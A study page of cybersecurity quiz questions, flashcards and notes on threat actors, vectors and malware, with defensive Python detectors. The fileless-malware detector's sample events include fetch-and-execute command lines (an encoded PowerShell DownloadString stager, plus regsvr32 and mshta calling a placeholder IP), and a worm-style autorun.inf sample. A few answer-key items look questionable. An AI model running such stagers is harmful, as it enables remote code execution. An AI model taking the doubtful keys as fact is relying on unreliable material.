Understanding Cyber Threats to Organizations

Questions and Answers

Which of the following best describes the primary function of a crypter in the context of malware?

  • To conceal the existence of malware. (correct)
  • To delete files on a target system.
  • To inject the main malware code into other running processes.
  • To replicate itself across a network.

Which type of threat actor is most likely to use freely available online tools to attempt network attacks primarily out of curiosity?

  • State-sponsored hackers
  • Script kiddies (correct)
  • Organized hackers
  • Industrial spies

Which type of malware is specifically designed to provide a remote attacker with full control over a victim's system?

  • Rootkit
  • Fileless Malware
  • Remote Access Trojan (correct)
  • Ransomware

An organization discovers that its customer database has been copied and sold to a competitor. Which threat actor is most likely responsible?

Industrial spy (D)

Which of the following best describes a 'logic bomb' in the context of computer security?

Malicious code triggered by a specific event or time. (D)

An organization's website is defaced with political messages. Which threat actor is most likely responsible?

Hacktivist (B)

Which of the following is a key characteristic that distinguishes a worm from a virus?

A worm replicates on its own without needing a host file, which lets it spread more rapidly than a virus. (C)

Which of these scenarios describes the exploitation of a vulnerability through a 'supply chain' threat vector?

An attacker exploits a vulnerability in a third-party vendor's software. (A)

Which type of threat is characterized by natural events that can potentially harm an organization's assets?

Natural threat (D)

Which of the following is the best definition of a threat vector?

A medium through which an attacker gains access to a system. (B)

Which of the following best describes the purpose of a packer in the context of malware?

To compress the malware file so that its code and data are converted into an unreadable format. (B)

Which of the following is a common technique used by attackers to distribute malware through the web by embedding malware in ad networks?

Malvertising (D)

What is the primary goal of 'black hat' search engine optimization (SEO) in the context of malware distribution?

To achieve higher search engine rankings for malware pages. (C)

Which of the following is an example of a potential consequence of 'data exfiltration' caused by a vulnerability?

Funds are stolen from customer accounts. (B)

What is a 'sparse infector' virus designed to do in order to avoid antivirus detection?

Infect less often, minimizing its probability of discovery. (D)

A company discovers that a disgruntled ex-employee used their privileged access to corrupt valuable resources. Which type of threat does this scenario represent?

Internal threat (B)

Which of the following best characterizes a 'direct action' or 'transient' virus?

It infects application files. (B)

Which type of Trojan can modify the HTML content displayed on specific websites targeted by attackers?

Defacement Trojans (C)

A technician discovers that a system's antivirus software is disabled and the default background has changed. Which type of malware infection is indicated by these activities?

Trojan (C)

Which of the following describes the primary characteristic of 'fileless malware'?

It resides primarily in the system's RAM. (B)

What primarily exposes organizations to 'system sprawl/undocumented assets' vulnerabilities?

An increasing number of systems and server connections added without proper documentation. (A)

An organization’s web server becomes unresponsive due to a flood of traffic originating from numerous compromised systems. Which type of malware is most likely involved?

Botnet (A)

What is the term for a weakness in a system's hardware or software?

Vulnerability (C)

Which security risk is primarily associated with the failure to change default settings on newly deployed network devices?

Exploitable known vulnerabilities and easy access for attackers (B)

Software vendors provide patches to reduce the probability of what?

Exploitation of known vulnerabilities (B)

Which of the following is primarily compromised due to lack of end-user awareness?

The network (C)

The risk that arises when an entity connects to another entity that later becomes infected by a cybersecurity threat is known as what?

Third-party risk (B)

Which risk to an entity's financial or user information arises from obsolete or well-known (familiar) code?

Legacy platform vulnerabilities (B)

What is the vulnerability called when private keys are not stored in a highly secured environment?

Improper certificate and key management (A)

Which of the following represents a risk that can lead to the compromise of financial or user information?

System sprawl/undocumented assets (A)

Devices ship with default settings chosen for usability. Once a device is deployed, what concern should follow usability?

Security (D)

A computer's usability is noticeably degraded after new browser add-ons appear that the user did not install. What is the likely cause?

Adware (C)

You visit a website that silently scans your device's files and plugins, detects a vulnerability, and acts on it. What type of attack is this?

A fileless propagation technique (D)

Which of the following does fileless malware abuse in order to run malicious code through legitimate components already present on the system?

Native applications (A)

What may be indicated when the system consumes more resources while producing less output?

A virus (B)

Why would an attacker vary the way similar activities are carried out using an application?

To make it harder to be tracked. (A)

When a virus hides from antivirus programs by actively altering and corrupting service call interrupts while it runs, what type of virus behaviour is being demonstrated?

Tunneling (A)

Which stage of the virus life cycle is defined as the virus replicating itself within a targeted system?

The replication stage (C)

A user installs freeware that secretly monitors the system's settings. What type of application is this?

Potentially Unwanted Application (B)

Which of the following activities represents the most direct realization of a cyber threat?

An attacker successfully exploiting a vulnerability to steal sensitive data. (A)

If a company's server becomes unavailable due to a severe weather event damaging its physical location, this scenario is categorized under which type of threat source?

Natural threat (C)

What distinguishes structured external threats from unstructured ones in the context of cybersecurity?

Structured threats are carried out by technically skilled attackers, while unstructured threats are not. (D)

In the context of cybersecurity threat actors, what is the primary characteristic that distinguishes a 'hacktivist'?

They aim to promote a political agenda by hacking. (A)

Which characteristic distinguishes state-sponsored hackers from other cyber threat actors?

They are employed by a government to collect classified data and damage the systems of other governments or organizations. (D)

What is the key differentiator between a 'black hat' hacker and a 'white hat' hacker?

Black hats use their skills for malicious purposes, while white hats use their skills for defensive purposes. (B)

Which of the following scenarios demonstrates the exploitation of the 'removable media' threat vector?

Malware automatically running from a USB drive plugged into a company computer. (C)

How does a supply chain attack operate as a threat vector to compromise an organization's security?

By exploiting vulnerabilities in third-party vendors and their resources to access the organization's systems. (A)

An attacker injects malicious code into cloud resources to access user information. What kind of attack vector is this?

Cloud (B)

A company finds out that its systems have been infected with Trojans, adware, and fileless malware. What kind of attack vector is this?

Ransomware/malware (C)

Which component of malware hides it from antivirus programs and makes reverse engineering difficult?

Crypter (C)

An employee installs an application from an untrusted website that monitors keyboard input and steals financial information. This is an example of:

Trojan (D)

A program infects a system, modifies the Master Boot Record (MBR), and spreads through email attachments. What type of malware is this?

Multipartite virus (A)

A file infects MS Word files through Visual Basic for Applications (VBA). What type of virus is this?

Macro virus (D)

Which type of virus conceals its code by actively altering and corrupting service call interrupts while running?

Stealth/tunneling virus (A)

A virus distributed through freeware/shareware, torrents, and fake advertisements is classified as what type of virus?

Encryption virus (B)

Which malware replicates independently, consumes computing resources, and spreads across network connections?

Worm (C)

What is the key result of a 'bot herder's' activity?

A network of compromised machines controlled through a command-and-control center. (C)

Which characteristic is most indicative of fileless malware?

It operates in and relies on the system's RAM. (A)

Why is it challenging to defend against fileless malware compared to traditional malware?

Because it uses already known and trusted tools. (C)

A program secretly tracks the system's settings without user consent. What type of malware is this?

Spyware (C)

What type of application floods users with unsolicited advertisements for online services while they browse the internet?

Adware (B)

Which of the following is an indicator of possible adware?

Frequent system crashes (D)

How do attackers use keystroke loggers?

To monitor each keystroke. (B)

How does a risk to security arise?

Through attackers looking for weaknesses (vulnerabilities) to exploit. (D)

An organization decides not to deploy an IDS or a firewall. What kind of design flaw does this represent?

Insecure design (A)

Which vulnerability results from failing to apply fixes (patches) that address known bugs?

Poor patch management (C)

A technician leaves simple or default passwords in place that can easily be cracked. Which vulnerability does this represent?

Default passwords (A)

What vulnerability is created when systems and servers are deployed without proper documentation?

System sprawl (B)

What term describes the security risk posed by older, unsupported versions of technology?

Obsolete (D)

Outdated keys left in a key management system can enable which attack?

Data exfiltration (B)

Company A outsources its data to a cloud provider without proper documentation. What type of risk is this?

Vendor management (C)

What is the implication of system sprawl?

There may be system or server connections that were made without documentation. (C)

Which impact refers to the potential theft of personal or financial information?

Identity theft (A)

Which impact refers to attackers preventing users from accessing websites and resources?

Denial of service (A)

How does an organization lose revenue after a breach?

By having to pay for the recovery of damages. (B)

After a breach, which type of impact subjects an entity to sanctions and fines?

Legal consequences (A)

Which of the following scenarios exemplifies an intentional threat originating from within an organization?

A terminated employee intentionally corrupts critical company data before their access is revoked. (A)

How are 'structured external threats' distinguished from 'unstructured external threats'?

Structured threats use sophisticated tools and techniques; unstructured threats use easily accessible tools with less skill. (B)

What is the primary motivation behind state-sponsored hackers targeting another country's information systems?

To gather intelligence, detect vulnerabilities, and damage systems of other governments or military organizations. (D)

What characteristic differentiates a 'black hat' hacker from a 'gray hat' hacker?

Black hats operate without permission for malicious purposes; gray hats may operate offensively and defensively, sometimes without permission. (C)

How does a 'drive-by download' compromise a user's system?

By exploiting vulnerabilities in browser software when a user visits a compromised website. (B)

Which of the following best describes the function of an 'obfuscator' in malware?

To conceal the malicious code of malware, making it difficult for security mechanisms to detect or remove it. (C)

An employee downloads a program that, along with its stated functionality, secretly installs a keylogger. What type of malware is this application considered?

Trojan (D)

A user notices their computer screen intermittently blinking, inverting colors, and displaying everything backward. Which type of malware infection is suggested by these indicators?

Trojan (C)

A company's security team discovers an application on an employee's computer connecting to a remote server and logging keystrokes. What type of malware is most likely present?

Keylogger (A)

What is the key difference between a virus and a worm in terms of propagation?

Viruses require a host file to propagate; worms can spread independently. (D)

An attacker has successfully created a botnet. How would an attacker leverage this network of infected computers?

To launch a distributed denial-of-service (DDoS) attack. (A)
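The two botnet questions above (the unresponsive web server flooded from numerous compromised systems, and leveraging a botnet for DDoS) describe a pattern a defender can detect in ordinary web-server logs: a distributed flood shows up as a sudden spike in request rate spread across many distinct source addresses, while a single attacker's flood spikes from one address. The following is an added example, not code from the original page or any product: it buckets constructed combined-format access-log lines into fixed windows and reports, per window, the request count, the number of distinct sources, and a verdict. The thresholds (50 requests and 20 distinct sources per 10-second window) and the log lines are assumptions chosen for the demo; real baselines come from your own traffic.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone

# Combined/common log format: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def _line(ip, second, path="/"):
    # Constructed log line; all addresses are documentation/private ranges.
    return f'{ip} - - [01/May/2024:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" 200 512'


def constructed_log():
    """Constructed sample: a normal window, a botnet-style flood, then a one-host flood."""
    lines = []
    # seconds 0-9: normal traffic, a handful of requests from three clients
    for s in range(10):
        lines.append(_line(["203.0.113.5", "203.0.113.9", "198.51.100.2"][s % 3], s))
    # seconds 10-19: distributed flood, 120 requests from 60 distinct compromised hosts
    for i in range(120):
        lines.append(_line(f"10.0.{i % 60}.{i % 60 + 1}", 10 + i // 12))
    # seconds 20-29: single-source flood, 80 requests from one host
    for i in range(80):
        lines.append(_line("192.0.2.77", 20 + i // 8))
    return lines


def parse_line(line):
    """Return (ip, aware datetime) or None for a line that does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts


def detect_floods(lines, window_s=10, rate_threshold=50, distinct_threshold=20):
    """Per fixed window: request count, distinct sources, dominant source, verdict."""
    windows = defaultdict(list)  # window start (epoch seconds) -> list of source ips
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed line: skip rather than crash the detector
        ip, ts = parsed
        start = int(ts.timestamp()) // window_s * window_s
        windows[start].append(ip)

    report = []
    for start in sorted(windows):
        ips = windows[start]
        requests, distinct = len(ips), len(set(ips))
        top_ip, top_count = Counter(ips).most_common(1)[0]
        if requests >= rate_threshold and distinct >= distinct_threshold:
            verdict = "distributed flood"      # many sources: botnet-like, rate-limit per IP will not help
        elif requests >= rate_threshold:
            verdict = "single-source flood"    # one or few sources: blockable at the edge
        else:
            verdict = "normal"
        report.append({
            "window_start": datetime.fromtimestamp(start, timezone.utc).isoformat(),
            "requests": requests,
            "distinct_sources": distinct,
            "top_source": top_ip,
            "top_source_share": round(top_count / requests, 2),
            "verdict": verdict,
        })
    return report


if __name__ == "__main__":
    for row in detect_floods(constructed_log()):
        print(row)
```

The distinction matters operationally: a single-source flood is handled by blocking or rate-limiting that address, whereas a distributed flood from many bots needs upstream scrubbing, geo/ASN filtering, or a CDN in front, because no single source stands out.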

Which of the following is a primary characteristic that makes fileless malware difficult to detect?

It resides in the system's RAM and infects legitimate software, applications, and processes. (B)
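The fileless-malware questions above (why it is hard to defend against because it uses already known and trusted tools, and why residing in RAM inside legitimate processes makes it hard to detect) point at where detection actually happens: not in a file scan, but in process-creation telemetry. The following is an added example, not code from the original page or any vendor product. It runs simple detection logic over constructed process-creation events (a pipe-delimited `timestamp|host|parent image|image|command line` format is assumed for the demo) and flags the usual fileless tells: an Office application spawning a script host, PowerShell launched with a hidden window, no profile or an encoded command (which it decodes, since `-EncodedCommand` is base64 of UTF-16LE text), in-memory download-and-execute, and LOLBins such as regsvr32, mshta or wmic pulling remote content. The IP address and scripts in the events are constructed.

```python
import base64
import re
from pathlib import PureWindowsPath


def _encode_ps(script):
    """PowerShell -EncodedCommand takes base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stager hidden behind -enc: download a script and run it in memory.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"

# Constructed events, not real telemetry: timestamp|host|parent image|image|command line
SAMPLE_EVENTS = [
    "2024-05-01T10:12:03Z|WS01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir C:\\Users",
    "2024-05-01T10:12:41Z|WS01|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc " + _encode_ps(STAGER),
    "2024-05-01T10:13:05Z|WS01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
    "2024-05-01T10:13:20Z|WS01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|"
    "wmic process call create mshta.exe http://198.51.100.7/p.hta",
    "2024-05-01T10:14:00Z|WS01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "wmic.exe", "cmd.exe"}
# -e, -ec, -en, -enc and -encodedcommand are all accepted abbreviations of -EncodedCommand
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
EVASION_RE = re.compile(r"-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden\b|-ep\s+bypass|executionpolicy\s+bypass", re.I)
DOWNLOAD_EXEC_RE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|invoke-webrequest|\biwr\b|net\.webclient", re.I)
REMOTE_SCRIPTLET_RE = re.compile(r"\b(?:regsvr32|mshta)\b.*https?://", re.I)
WMI_CREATE_RE = re.compile(r"\bwmic\b.*process\s+call\s+create", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return PureWindowsPath(path).name.lower()


def analyze_event(line):
    """Return the list of findings for one process-creation event (empty if nothing suspicious)."""
    _ts, _host, parent, image, cmd = line.split("|", 4)
    parent_name, image_name = _basename(parent), _basename(image)
    findings = []
    if parent_name in OFFICE_PARENTS and image_name in SCRIPT_HOSTS:
        findings.append(f"office app {parent_name} spawned {image_name}")
    decoded = decode_encoded_command(cmd)
    if decoded:
        findings.append(f"encoded PowerShell decodes to: {decoded}")
    if EVASION_RE.search(cmd):
        findings.append("evasion flags (hidden window / no profile / policy bypass)")
    if DOWNLOAD_EXEC_RE.search(decoded or "") or DOWNLOAD_EXEC_RE.search(cmd):
        findings.append("in-memory download-and-execute")
    if REMOTE_SCRIPTLET_RE.search(cmd):
        findings.append("LOLBin fetching a remote scriptlet/HTA")
    if WMI_CREATE_RE.search(cmd):
        findings.append("process creation via WMI")
    return findings


def analyze_log(lines):
    """Return (timestamp, image basename, findings) for every event that raised a finding."""
    hits = []
    for line in lines:
        findings = analyze_event(line)
        if findings:
            hits.append((line.split("|", 1)[0], _basename(line.split("|", 4)[3]), findings))
    return hits


if __name__ == "__main__":
    for ts, image, findings in analyze_log(SAMPLE_EVENTS):
        print(ts, image)
        for f in findings:
            print("   -", f)
```

None of these rules touch a file on disk: the signal is the parent/child relationship and the command line, which is exactly why Sysmon or EDR process-creation logging (with command-line capture enabled) is the control that matters for fileless tradecraft. The benign entries (explorer running `cmd /c dir`, an administrator running a script by path) produce no findings, which is the check you want before turning a rule like this into an alert.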

A user is experiencing frequent pop-up ads, redirections to unfamiliar websites, and a new toolbar in their browser that they did not install. What might cause this activity?

Adware infection. (B)

Your computer has been infected with a program displaying unsolicited sales and pop-ups. What type of PUA is it?

Adware (D)

Which of the following best describes a 'zero-day vulnerability'?

A vulnerability that is known to attackers but not yet patched by the software vendor. (A)

Why does failing to change default settings on network devices create a vulnerability?

It makes it easier for attackers to guess the necessary configurations to compromise the system. (A)

An organization neglects to document new systems and server connections. Which kind of vulnerability is likely to arise?

System sprawl (B)

Leaked database credentials have led to external exploitation of the database. Classify the issue.

Design flaw (D)

What is the primary risk associated with using unsupported legacy platforms within an organization's infrastructure?

Vulnerabilities caused by obsolete and well-known (familiar) systems. (B)

Why should private keys used with certificates always be stored in a highly secured environment?

This prevents unauthorized individuals from intercepting the keys and gaining access to confidential data or critical systems. (A)

Flashcards

What is a Threat?

A potential occurrence of an undesirable event that can eventually cause damage or disrupt operations.

Examples of Threats

Stealing sensitive data, causing server shutdowns, tricking employees, or infecting systems with malware.

Natural Threats

Threats from natural events like fires and floods.

Unintentional Threats

Threats from unintentional human errors, negligence, or accidents.

Intentional Threats

Deliberate actions: insider attacks, or external attacks by skilled or unskilled hackers.

Black Hats

Skilled hackers with malicious intent.

White Hats

Ethical hackers using skills for defensive purposes.

Gray Hats

Hackers working both offensively and defensively.

Suicide Hackers

Hackers bringing down critical infrastructure for a cause.

Script Kiddies

Unskilled hackers using premade scripts and tools.

Cyber Terrorists

Individuals with religious or political motivations who seek large-scale disruption of computer networks.

State-Sponsored Hackers

Government-employed hackers for espionage and system damage.

Hacktivist

Individuals promoting a political agenda through hacking.

Hacker Teams

Collaborative skilled hackers with resources and funding dedicated to advanced research and coordinated attacks.

Industrial Spies

Individuals performing corporate espionage for competitive advantage.

Insider

Trusted individuals misusing critical access within an organization.

Criminal Syndicates

Organized groups engaged in planned, prolonged criminal schemes to embezzle money.

Organized Hackers

Criminals renting botnets to pilfer money through cyber-attacks.

Threat Vector

The medium through which an attacker gains access to a system.

Direct access

Gaining physical access to perform malicious activities.

Removable media

Using USBs to spread malware, steal, or corrupt files.

Wireless

Compromising unsecured wireless connections and networks.

Email

Using phishing emails with malicious attachments for system compromise.

Cloud

Malware injected into cloud resources to gain access to user data.

Ransomware/malware

Using unpatched vulnerabilities to inject ransomware and malware.

Supply chain

Compromising vulnerabilities within a third-party supply chain.

Business partners

Attacking through business partnerships and third party organizations.

What is Malware?

Malicious software that damages computer systems and gives its creator control over them.

Malware System Entry

Instant messengers, removable devices and email attachments.

Crypter

A program that conceals the existence of malware.

Downloader

A type of Trojan that downloads other malware from the Internet.

Dropper

A covert carrier that embeds malware files and installs them on the target system.

Exploit

Code that takes advantage of a vulnerability to breach system security.

Injector

Program injecting malicious code into other running processes.

Obfuscator

Program concealing malicious code of malware.

Packer

Software compressing malware file to mask its contents.

Payload

Part of malware performing the desired malicious activity.

Malicious Code

The actual code causing security breaches in malware.

What is a Trojan?

A program disguised as harmless, used to gain control and steal data.

Remote Access Trojans

Remote Access Trojans (RATs) provide attackers with full control over the victim's system.

Backdoor Trojans

Bypasses authentication/firewalls, and gives hackers backdoor access to your computer.

Botnet Trojans

Tricks users into downloading a Trojan that enrolls the system in a network of controlled bots.

Rootkit Trojans

Potent backdoors that grant root/admin-level access by hooking system services; rootkits are very hard to spot and give the attacker full control.

E-banking Trojans

Intercept the victim's banking data; among the most dangerous Trojans.

Point-of-Sale Trojans

Target point-of-sale systems to steal credit card data.

Defacement Trojans

Modify the HTML content of targeted websites, or destroy website or system contents.

Service Protocol Trojans

Perform attacks over service protocols such as VNC and DNS.

Mobile Trojans

Malicious code that targets mobile phones.

Security Software Disabler Trojans

Trojans that stop security programs from working.

What is a Virus?

A malicious program that can copy itself and infect a PC.

Virus Characteristic

Infects other files, transforms itself, and encrypts itself.

Study Notes

Threats

  • A threat refers to something that can cause damage and disrupt operational activities of an organization.
  • Attackers use threats to infiltrate and steal data, such as personal info, financial info, and login credentials.

Examples of Threats

  • An attacker stealing sensitive data.
  • An attacker causing a server to shut down.
  • An attacker tricking an employee into revealing sensitive information.
  • An attacker infecting a system with malware.
  • An attacker spoofing the identity of an authorized person to gain access.
  • An attacker modifying or tampering with data transferred over a network.
  • An attacker remotely altering data in a database server.
  • An attacker performing URL redirection or forwarding.
  • An attacker performing privilege escalation for unauthorized access.
  • An attacker executing a denial-of-service (DoS) attack for making resources unavailable.
  • An attacker eavesdropping on a communication channel without authorization.

Threat Sources

  • Threats can be classified into natural, unintentional, and intentional.
  • Natural threats include fires, floods and power failures and have the potential to cause physical damage to computer systems.
  • Unintentional threats originate from accidental insider security breaches, negligence, operator errors, unskilled administrators, or untrained employees.
  • Intentional threats are deliberate: internal attacks performed by disgruntled employees or other insiders, and external attacks performed by skilled or unskilled hackers.
  • Most computer and internet related crimes are internal attacks performed by individuals within the organization.
  • External attacks exploit vulnerabilities already present in a network, and the potential severity depends on the identified network weaknesses.
  • Structured external threats are carried out by technically skilled attackers who use tools to gain access to a network with the intention of disrupting services.
  • The motivation behind structured attacks can vary but includes criminal bribes, racism, politics, and terrorism.
  • Structured external threats include examples like distributed ICMP floods, spoofing, and attacks executed simultaneously from multiple sources.
  • Unstructured external threats are performed by unskilled attackers and aspiring hackers, and are typically driven by curiosity rather than criminal intent.
  • Unstructured external attacks mostly consist of port scans and address sweeps, and can be easily prevented with security solutions that detect them.
  • An example is using freely available online tools to attack a network or crash a website.

Threat Actors/Agents

  • Black hats use their extraordinary computing skills for illegal or malicious purposes, often engaging in criminal activities, and are also known as crackers.
  • White hats (penetration testers) use their hacking skills for defensive purposes with permission from the system owner, such as security analysts knowledgeable about countermeasures.
  • Gray hats work both offensively and defensively at various times, helping hackers find vulnerabilities while assisting vendors to improve products (software/hardware).
  • Suicide hackers aim to bring down critical infrastructure for a cause and are unconcerned about facing jail terms or other punishment.
  • Script kiddies are unskilled hackers using scripts, tools, and software developed by real hackers, focusing on the quantity of attacks instead of quality.
  • Cyber terrorists with religious or political motivations aim to create fear through large-scale disruption of computer networks
  • State-sponsored hackers, employed by governments, seek to penetrate systems, gain top-secret information, and damage other governments.
  • Industrial spies perform corporate espionage to steal critical information like blueprints and formulas, often using advanced persistent threats (APTs) and social engineering.
  • Insiders are employees (trusted persons) with critical asset access who use their privileges to violate rules or harm the organization's systems, often due to disgruntled or terminated status.
  • Hacker teams are skilled hackers with resources and funding working together to research state-of-the-art technologies
  • Criminal syndicates are part of organized and prolonged criminal activities that exploit victims from distinct jurisdictions to embezzle money through cyber attacks.
  • Hacktivists hack into government or corporate computer systems as a form of activism.
  • Organized hackers are groups of hackers that work together in criminal activities that sell the information to the highest bidder.

Attributes of Threat Actors

  • Internal actors are trusted insiders with authorized access to resources.
  • External actors are outsiders with no authorized access to the organization's resources.
  • The level of sophistication determines how capable a threat actor is; highly sophisticated actors are more likely to succeed than less sophisticated ones.
  • Resources/funding determines how a threat actor supports an attack financially or with tools.
  • Intent/motivation of threat actors can be connected to political/personal goals, making them more likely to launch an attack.

Threat Vectors

  • Direct access is where the attacker gains physical access to the target system and performs malicious activities.
  • Removable Media is where devices such as USB drives, phones, and printers become a way for malware to run automatically on the system.
  • Wireless is where corporate devices can be compromised through unsecured wireless hotspots and/or credentials being stolen.
  • Email sends phishing attacks containing malicious attachments that allow attackers to compromise their targets.
  • Cloud contains injected malware into cloud resources to gain access to user information.
  • Ransomware/Malware takes advantage of unpatched vulnerabilities as well as malware to infiltrate an organization.
  • Supply chain attempts to compromise the target by exploiting vulnerabilities in the resources supplied by third-party vendors.
  • Business partners are third-party organizations that emerge as a threat vector.

Autorun.inf Mitigation

  • Autorun.inf is a configuration file in the root of removable or optical media; when the media is inserted, Windows AutoRun reads it and launches the executable it names (the open= or shellexecute= entry), while Explorer displays the icon and label it specifies. Malware abuses this to run as soon as the drive is plugged in.
  • To mitigate the autorun.inf threat, the AutoRun/AutoPlay (Autostart) functionality should be turned off.
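What AutoRun actually does with the file is easiest to see by parsing one. The following is an added example, not code from the original page or from any Windows component: it reads a constructed autorun.inf of the kind USB worms used to drop (every launch entry pointing at a hidden executable, while the label and action text make the drive look like a folder of photos) and extracts exactly the entries AutoRun would execute: open=, shellexecute=, and shell\<verb>\command=. The sample files and the executable-extension list are assumptions for the demo.

```python
import configparser

# Constructed autorun.inf samples (not taken from the page or from any real infection).
# The first follows the classic USB-worm pattern: every AutoRun entry points at a
# hidden executable, while label/action/icon make the drive look like a plain folder.
MALICIOUS_AUTORUN_INF = r"""
[autorun]
open=RECYCLER\S-1-5-21-1482476501\update.exe
shellexecute=RECYCLER\S-1-5-21-1482476501\update.exe
shell\open\command=RECYCLER\S-1-5-21-1482476501\update.exe
shell\explore\command=RECYCLER\S-1-5-21-1482476501\update.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
label=Photos
action=Open folder to view files
"""

# A harmless one only sets the drive's label and icon; nothing is executed.
BENIGN_AUTORUN_INF = """
[autorun]
label=Backup Drive
icon=drive.ico
"""

LAUNCH_KEYS = ("open", "shellexecute")
EXECUTABLE_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")


def parse_autorun(text):
    """Return {key: target} for every entry AutoRun would execute.
    INF keys are case-insensitive; a file without an [autorun] section runs nothing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str.lower
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # malformed file: AutoRun would ignore it, and so do we
    if not cp.has_section("autorun"):
        return {}
    launches = {}
    for key, value in cp.items("autorun"):
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            launches[key] = value.strip()
    return launches


def assess_autorun(text):
    """Classify an autorun.inf by what it would launch: returns (launches, verdict)."""
    launches = parse_autorun(text)
    if not launches:
        return launches, "benign: nothing would be executed"
    for key, target in launches.items():
        t = target.lower()
        # executables, or anything hiding in folders Explorer normally keeps out of sight
        if t.endswith(EXECUTABLE_EXT) or "recycler" in t or "system volume information" in t:
            return launches, f"malicious: '{key}' launches {target}"
    return launches, "review: AutoRun launches a non-executable target"


if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_AUTORUN_INF), ("benign", BENIGN_AUTORUN_INF)):
        launches, verdict = assess_autorun(sample)
        print(f"{name}: {verdict}")
        for key, target in launches.items():
            print(f"  {key} -> {target}")
```

On the mitigation side, the policy that turns AutoRun off for every drive type is the `NoDriveTypeAutoRun` value under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` set to 0xFF; since Windows 7 (and the corresponding update for earlier versions) Windows no longer honours autorun.inf on USB media at all, only on optical discs, but the policy is still the right belt-and-braces setting, and the parser above is what you run over a suspicious stick in an analysis VM rather than plugging it into a workstation.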

Common Malware Distribution Techniques

  • Black hat SEO uses aggressive SEO tactics to rank malware pages highly in search results.
  • Social-engineered click-jacking tricks users into clicking on innocent-looking web pages that deliver malware.
  • Spear-phishing mimics legitimate institutions in an attempt to steal login credentials.
  • Malvertising embeds malware in ad networks so that it is displayed across hundreds of legitimate, high-traffic sites.
  • Compromised legitimate websites host embedded malware that spreads to unsuspecting visitors.
  • Drive-by downloads use browser flaws to install malware just by visiting a web page.
  • Spam emails carry the malware as an attachment and trick victims into opening it.

General Malware Components

  • Crypters conceal the existence of malware by encrypting its body so that signature-based scanners cannot recognize it; a small stub decrypts it at run time.
  • Downloaders are small trojans that fetch additional malicious code from the Internet after the initial infection.
  • Droppers carry the malware embedded inside themselves and covertly write it to disk and install it.
  • Exploits contain code that takes advantage of bugs/vulnerabilities to break security. Local exploits need existing access to the host (typically for privilege escalation); remote exploits are launched over the network.
  • Injectors inject malicious code into running (often trusted or vulnerable) processes and alter their methods so the code executes under the host process's identity.
  • Obfuscators conceal malicious code through techniques such as string encoding, junk code and control-flow changes to make analysis difficult.
  • Packers compress the malware file into an unreadable form on disk; it is only restored in memory by an unpacking stub.
  • Payloads perform the intended activity once activated; they may modify or delete files, open ports, and so on.
  • Malicious code defines the basic functionality of the malware and can take various forms: Java applets, ActiveX controls, browser plug-ins and pushed content.
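To make the packer/crypter/payload relationship concrete, here is an added Python example (not code from the original notes): a toy packer-plus-crypter, the matching unpack step a loader stub would perform, and the entropy check analysts use to spot packed or encrypted bodies. The payload text and the XOR key are constructed for the example; real crypters use proper ciphers and per-build keys, but the high-entropy artefact they leave is the same.

```python
import math
import random
import zlib
from collections import Counter

# Constructed stand-in for a payload: a few KB of command-like text built from
# a small vocabulary with a fixed seed, so the example is repeatable offline.
_VOCAB = ["net", "user", "add", "reg", "query", "schtasks", "create", "copy",
          "powershell", "invoke", "download", "start", "cmd", "exit", "echo",
          "whoami", "ipconfig", "tasklist", "sc", "stop"]
_rng = random.Random(1)
PLAIN_PAYLOAD = (" ".join(_rng.choice(_VOCAB) for _ in range(2000)) + "\n").encode()
XOR_KEY = b"k3y-str34m"   # hypothetical crypter key, as embedded in a stub


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, from 0.0 (one repeated byte) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


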